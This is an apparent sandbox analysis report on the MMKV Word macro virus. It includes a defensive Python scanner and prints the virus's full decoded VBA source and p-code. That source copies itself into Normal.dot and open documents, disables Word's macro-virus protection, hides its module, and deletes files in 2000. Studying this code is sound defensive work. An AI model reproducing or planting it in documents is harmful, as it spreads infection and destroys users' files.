Verdict: MALICIOUS
Risk Score: 248
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious OLE (Word 97-2003) document whose VBA project contains a module named MMKV (stream Macros/VBA/MMKV) implementing a W97M-class macro virus that labels itself "MK-Words (V1) By MMK 1999" in the document summary Comments field it writes on every infection. AutoExec and AutoOpen run when the document is opened. AutoOpen first checks the date: if Year(Now) = 2000 it runs Kill "c:\*.*" and Kill "*.*" and shows a "Welcome To Y2K" message box, a destructive Y2K-triggered payload. It then disables Ctrl+Break (Application.EnableCancelKey = wdCancelDisabled), re-enables auto macros through the WordBasic compatibility object (WordBasic.DisableAutoMacros 0), turns off Word's macro-virus warning (Options.VirusProtection = False) and the Normal-template save prompt, and calls Copy_Tmp and Copy_Vir. Those two procedures use Application.OrganizerCopy to copy the MMKV project item into Normal.dot and from there into every document that is opened or saved, via hooks on the FileOpen, FileSave and FileSaveAs commands; FileSaveAs additionally forces the document to be saved as a template so the macro survives. The WINMK.SYS handling is a stealth routine, not a downloader or dropper: the ToolsMacro hook exports the MMKV module to %WINDIR%\SYSTEM\WINMK.SYS (WinDir is read from the WINDIR= line of c:\msdos.sys, so the code targets Windows 9x; on other systems Find_Win leaves WinDir empty), deletes the module from Normal.dot while the Tools > Macro dialog is displayed, then re-imports the module and deletes the file, so the user never sees it listed. Nothing is downloaded and the sample has no network behaviour. The procedure names the legacy-WordBasic heuristic keyed on (AutoOpen, ToolsMacro, FileOpen) belong to this VBA module; the sample is a Word 97 VBA project, not a Word 6/95 WordBasic macro. Note that the extracted source stores Sub ToolsMacro() / End Sub immediately followed by the export/import statements and a second End Sub outside any procedure, and the p-code dump further down shows the same layout, so this is how the module was stored rather than an extraction artefact; statements outside a procedure do not compile in VBA, so treat the hiding routine as the author's evident intent rather than confirmed runtime behaviour.
Heuristics (5)
- ClamAV: Doc.Trojan.Mmkv-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Mmkv-1
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: AutoOpen
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. In this sample the markers (AutoOpen, ToolsMacro) are procedure names inside the extracted VBA module, so the rule fired on the names rather than on a hidden Word 6/95 macro; the VBA extraction did capture the code.
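The three macro-specific heuristics above (replication / AV tampering, auto-execution, command-hook names) are straightforward to reproduce as a static triage pass over extracted VBA source. The following is an added example, not oletools code and not the analyzer's rule set: it runs simplified regex rules of my own over an excerpt of the MMKV module copied from this report's extracted script and over a constructed benign control macro, and classifies each. The rule ids, severities and the verdict logic are assumptions chosen for illustration.

```python
"""Static triage of extracted Word VBA source for W97M-style macro-virus
behaviour. Added example: not oletools code and not the analyzer's rule set.
Rule ids, severities and the verdict logic are assumptions for illustration."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str  # low | medium | high | critical
    line_no: int
    line: str


# Behaviour-based rules (case-insensitive, as VBA identifiers are). They key on
# what the code does, not on the "MMKV" name, so a renamed module still fires.
RULES = [
    # Procedures Word runs on its own (document open/close/new, AutoExec).
    ("AUTO_EXEC_MACRO", "low",
     re.compile(r"^(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|AutoExec|AutoClose|AutoNew|AutoExit|Document_Open)\b", re.I)),
    # Procedures that override built-in Word commands (the classic infection/hiding hooks).
    ("COMMAND_HOOK", "medium",
     re.compile(r"^(?:Public\s+|Private\s+)?Sub\s+(?:FileSave|FileSaveAs|FileOpen|ToolsMacro|ViewVBCode)\s*\(", re.I)),
    # Switching off the macro-virus warning, Ctrl+Break, auto-macro and Normal.dot save prompts.
    ("DEFENSE_TAMPERING", "critical",
     re.compile(r"Options\.VirusProtection\s*=\s*False|WordBasic\.DisableAutoMacros|"
                r"Options\.SaveNormalPrompt\s*=\s*False|EnableCancelKey\s*=\s*wdCancelDisabled", re.I)),
    # Copying project items between documents/Normal.dot or writing module code at runtime.
    ("SELF_REPLICATION", "critical",
     re.compile(r"\bOrganizerCopy\b|VBComponents\.Import\b|VBComponents\.Add\b|"
                r"CodeModule\.(?:InsertLines|AddFromString)\b", re.I)),
    # Exporting/removing a module so it does not show in Tools > Macro.
    ("MODULE_HIDING", "high",
     re.compile(r"VBComponents\([^)]*\)\.Export\b|\bOrganizerDelete\b", re.I)),
    # Wildcard file deletion (the Y2K payload in this sample).
    ("DESTRUCTIVE_PAYLOAD", "critical",
     re.compile(r"\bKill\s+\"(?:[a-z]:\\)?\*\.\*\"", re.I)),
]

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def scan_vba(source: str) -> list[Finding]:
    """Return one Finding per (line, rule) match. Comment lines are skipped, so a
    pcodedmp-style disassembly appended as comments is not double-counted."""
    findings: list[Finding] = []
    for n, raw in enumerate(source.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue
        for rule, severity, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(rule, severity, n, line))
    return findings


def rule_counts(findings: list[Finding]) -> Counter:
    return Counter(f.rule for f in findings)


def verdict(findings: list[Finding]) -> str:
    """Auto-execution (or a command hook) combined with self-replication is a
    macro virus whatever the AV signature says; any critical hit alone is
    suspicious; lesser hits just need a look."""
    rules = {f.rule for f in findings}
    if rules & {"AUTO_EXEC_MACRO", "COMMAND_HOOK"} and "SELF_REPLICATION" in rules:
        return "MALICIOUS (macro virus)"
    if any(SEVERITY_RANK[f.severity] >= SEVERITY_RANK["critical"] for f in findings):
        return "SUSPICIOUS"
    return "REVIEW" if findings else "CLEAN"


# Excerpt of the MMKV module from this report's extracted script (trimmed to the
# procedures that matter; the report's preview has the full module).
SAMPLE_MMKV = r'''
Sub AutoExec()
AutoOpen
End Sub
Sub AutoOpen()
If Year(Now) = 2000 Then Kill "c:\*.*": Kill "*.*": MsgBox "Welcome To Y2K", 0, "MK-Words By MMK 1999"
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Copy_Tmp
Copy_Vir
End Sub
Sub ToolsMacro()
End Sub
Find_Win
NormalTemplate.VBProject.VBComponents("MMKV").Export WinDir + "\SYSTEM\" + "WINMK.SYS"
Application.OrganizerDelete NormalTemplate.FullName, "MMKV", wdOrganizerObjectProjectItems
While Dialogs(wdDialogToolsMacro).Display
Wend
NormalTemplate.VBProject.VBComponents.import WinDir + "\SYSTEM\" + "WINMK.SYS"
Kill WinDir + "\SYSTEM\" + "WINMK.SYS"
End Sub
Sub Copy_Tmp()
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "MMKV", wdOrganizerObjectProjectItems
End Sub
'''

# Constructed benign control: an auto macro that only formats the document.
SAMPLE_BENIGN = r'''
Sub Document_Open()
    ActiveDocument.Range.Font.Name = "Calibri"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("MMKV excerpt", SAMPLE_MMKV), ("benign control", SAMPLE_BENIGN)):
        found = scan_vba(src)
        print(f"{name}: {verdict(found)} {dict(rule_counts(found))}")
        for f in found:
            print(f"  [{f.severity:8}] {f.rule:20} line {f.line_no}: {f.line[:70]}")
```

The verdict deliberately does not rely on the AutoOpen name alone: the benign control also has an auto macro and only comes back as REVIEW. What tips the MMKV excerpt to MALICIOUS is the combination of an auto-execution or command-hook procedure with OrganizerCopy / VBComponents.Import, which is the same pairing the OLE_VBA_MACRO_VIRUS_REPLICATION heuristic describes. Feed the scanner the whole macros.bas artifact and the comment-skipping keeps the p-code disassembly from inflating the counts.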
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10178 bytes | c1bacf65fa1ae537b77c056403bcce2c082efea56b0ed20dd199515d0ad12a3f | ClamAV: Doc.Trojan.Mmkv-1 | unlikely |
Preview script (first 1,000 lines of the extracted script). The decoded source of the ThisDocument, MMKV and empty NewMacros modules is followed by a p-code disassembly of the module streams, rendered as VBA comment lines.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MMKV"
Public WinDir As String
Public DataDot As Boolean
Sub AutoExec()
AutoOpen
End Sub
Sub AutoOpen()
If Year(Now) = 2000 Then Kill "c:\*.*": Kill "*.*": MsgBox "Welcome To Y2K", 0, "MK-Words By MMK 1999"
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Copy_Tmp
Copy_Vir
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument, "MMKV", wdOrganizerObjectProjectItems
ActiveDocument.Save
End Sub
Sub FileOpen()
fa = Dialogs(wdDialogFileOpen).Show
If fa = "" Then GoTo asa
Copy_Vir
asa:
ActiveDocument.Save
End Sub
Sub ToolsMacro()
End Sub
Find_Win
NormalTemplate.VBProject.VBComponents("MMKV").Export WinDir + "\SYSTEM\" + "WINMK.SYS"
Application.OrganizerDelete NormalTemplate.FullName, "MMKV", wdOrganizerObjectProjectItems
While Dialogs(wdDialogToolsMacro).Display
Wend
NormalTemplate.VBProject.VBComponents.import WinDir + "\SYSTEM\" + "WINMK.SYS"
Kill WinDir + "\SYSTEM\" + "WINMK.SYS"
End Sub
Sub FileSave()
If ActiveDocument.FullName = "" Then Dialogs(wdDialogFileSaveAs).Show
Copy_Vir
ActiveDocument.Save
End Sub
Sub viewvbcode()
End Sub
Sub Find_Win()
Close
Dim WD As String
On Error GoTo Err_F
F = FreeFile
Open "c:\msdos.sys" For Input As #F
Do Until EOF(F)
Line Input #F, WD
If Left(UCase(WD), 7) = "WINDIR=" Then
L = Len(WD)
WinDir = UCase$(Mid$(WD, 8, L))
End If
Loop
GoTo END_S
Err_F:
WinDir = ""
END_S:
Close #F
End Sub
Sub Copy_Vir()
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "MMKV" Then GoTo INFECTED
Next
Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "MMKV", wdOrganizerObjectProjectItems
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "MK-Words (V1) By MMK 1999"
.Execute
End With
ActiveDocument.Save
INFECTED:
End Sub
Sub Copy_Tmp()
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "MMKV" Then GoTo INFECTED
Next
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "MMKV", wdOrganizerObjectProjectItems
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "MK-Words (V1) By MMK 1999"
.Execute
End With
ActiveDocument.Save
INFECTED:
Copy_Vir
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "MK-Words (V1) By MMK 1999"
.Execute
End With
ActiveDocument.Save
End Sub
Attribute VB_Name = "NewMacros"
' Processing file: /tmp/qstore_jg33qqjj
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/MMKV - 5384 bytes
' Line #0:
' Dim (Public)
' VarDefn WinDir (As String)
' Line #1:
' Dim (Public)
' VarDefn DataDot (As Boolean)
' Line #2:
' Line #3:
' FuncDefn (Sub AutoExec())
' Line #4:
' ArgsCall AutoOpen 0x0000
' Line #5:
' EndSub
' Line #6:
' FuncDefn (Sub AutoOpen())
' Line #7:
' Ld Now
' ArgsLd Year 0x0001
' LitDI2 0x07D0
' Eq
' If
' BoSImplicit
' LitStr 0x0006 "c:\*.*"
' ArgsCall Kill 0x0001
' BoS 0x0000
' LitStr 0x0003 "*.*"
' ArgsCall Kill 0x0001
' BoS 0x0000
' LitStr 0x000E "Welcome To Y2K"
' LitDI2 0x0000
' LitStr 0x0014 "MK-Words By MMK 1999"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #8:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #9:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #10:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #11:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #12:
' ArgsCall Copy_Tmp 0x0000
' Line #13:
' ArgsCall Copy_Vir 0x0000
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Sub FileSaveAs())
' Line #16:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #17:
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' If
' BoSImplicit
' Ld wdFormatTemplate
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' EndIf
' Line #18:
' Ld NormalTemplate
' MemLd FullName
' Ld ActiveDocument
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #19:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #20:
' EndSub
' Line #21:
' FuncDefn (Sub FileOpen())
' Line #22:
' Ld wdDialogFileOpen
' ArgsLd Dialogs 0x0001
' MemLd Show
' St fa
' Line #23:
' Ld fa
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo asa
' EndIf
' Line #24:
' ArgsCall Copy_Vir 0x0000
' Line #25:
' Label asa
' Line #26:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #27:
' EndSub
' Line #28:
' FuncDefn (Sub ToolsMacro())
' Line #29:
' EndSub
' Line #30:
' ArgsCall Find_Win 0x0000
' Line #31:
' Ld WinDir
' LitStr 0x0008 "\SYSTEM\"
' Add
' LitStr 0x0009 "WINMK.SYS"
' Add
' LitStr 0x0004 "MMKV"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #32:
' Ld NormalTemplate
' MemLd FullName
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerDelete 0x0003
' Line #33:
' Ld wdDialogToolsMacro
' ArgsLd Dialogs 0x0001
' MemLd Display
' While
' Line #34:
' Wend
' Line #35:
' Ld WinDir
' LitStr 0x0008 "\SYSTEM\"
' Add
' LitStr 0x0009 "WINMK.SYS"
' Add
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall import 0x0001
' Line #36:
' Ld WinDir
' LitStr 0x0008 "\SYSTEM\"
' Add
' LitStr 0x0009 "WINMK.SYS"
' Add
' ArgsCall Kill 0x0001
' Line #37:
' EndSub
' Line #38:
' FuncDefn (Sub FileSave())
' Line #39:
' Ld ActiveDocument
' MemLd FullName
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' EndIf
' Line #40:
' ArgsCall Copy_Vir 0x0000
' Line #41:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #42:
' EndSub
' Line #43:
' FuncDefn (Sub viewvbcode())
' Line #44:
' EndSub
' Line #45:
' FuncDefn (Sub Find_Win())
' Line #46:
' CloseAll
' Line #47:
' Dim
' VarDefn WD (As String)
' Line #48:
' OnError Err_F
' Line #49:
' Ld Friend
' St False
' Line #50:
' LitStr 0x000C "c:\msdos.sys"
' Ld False
' Sharp
' LitDefault
' Open (For Input)
' Line #51:
' Ld False
' ArgsLd EOF 0x0001
' DoUnitil
' Line #52:
' Ld False
' Ld WD
' LineInput
' Line #53:
' Ld WD
' ArgsLd UCase 0x0001
' LitDI2 0x0007
' ArgsLd LBound 0x0002
' LitStr 0x0007 "WINDIR="
' Eq
' IfBlock
' Line #54:
' Ld WD
' FnLen
' St L
' Line #55:
' Ld WD
' LitDI2 0x0008
' Ld L
' ArgsLd Mid$$ 0x0003
' ArgsLd UCase$ 0x0001
' St WinDir
' Line #56:
' EndIfBlock
' Line #57:
' Loop
' Line #58:
' GoTo END_S
' Line #59:
' Label Err_F
' Line #60:
' LitStr 0x0000 ""
' St WinDir
' Line #61:
' Label END_S
' Line #62:
' Ld False
' Sharp
' Close 0x0001
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub Copy_Vir())
' Line #65:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #66:
' Ld I
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0004 "MMKV"
' Eq
' If
' BoSImplicit
' GoTo INFECTED
' EndIf
' Line #67:
' StartForVariable
' Next
' Line #68:
' Ld NormalTemplate
' MemLd FullName
' Ld ActiveDocument
' MemLd FullName
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #69:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #70:
' LitStr 0x0019 "MK-Words (V1) By MMK 1999"
' MemStWith Comments
' Line #71:
' ArgsMemCallWith Execute 0x0000
' Line #72:
' EndWith
' Line #73:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #74:
' Label INFECTED
' Line #75:
' EndSub
' Line #76:
' FuncDefn (Sub Copy_Tmp())
' Line #77:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #78:
' Ld I
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0004 "MMKV"
' Eq
' If
' BoSImplicit
' GoTo INFECTED
' EndIf
' Line #79:
' StartForVariable
' Next
' Line #80:
' Ld ActiveDocument
' MemLd FullName
' Ld NormalTemplate
' MemLd FullName
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #81:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #82:
' LitStr 0x0019 "MK-Words (V1) By MMK 1999"
' MemStWith Comments
' Line #83:
' ArgsMemCallWith Execute 0x0000
' Line #84:
' EndWith
' Line #85:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #86:
' Label INFECTED
' Line #87:
' ArgsCall Copy_Vir 0x0000
' Line #88:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #89:
' LitStr 0x0019 "MK-Words (V1) By MMK 1999"
' MemStWith Comments
' Line #90:
' ArgsMemCallWith Execute 0x0000
' Line #91:
' EndWith
' Line #92:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #93:
' EndSub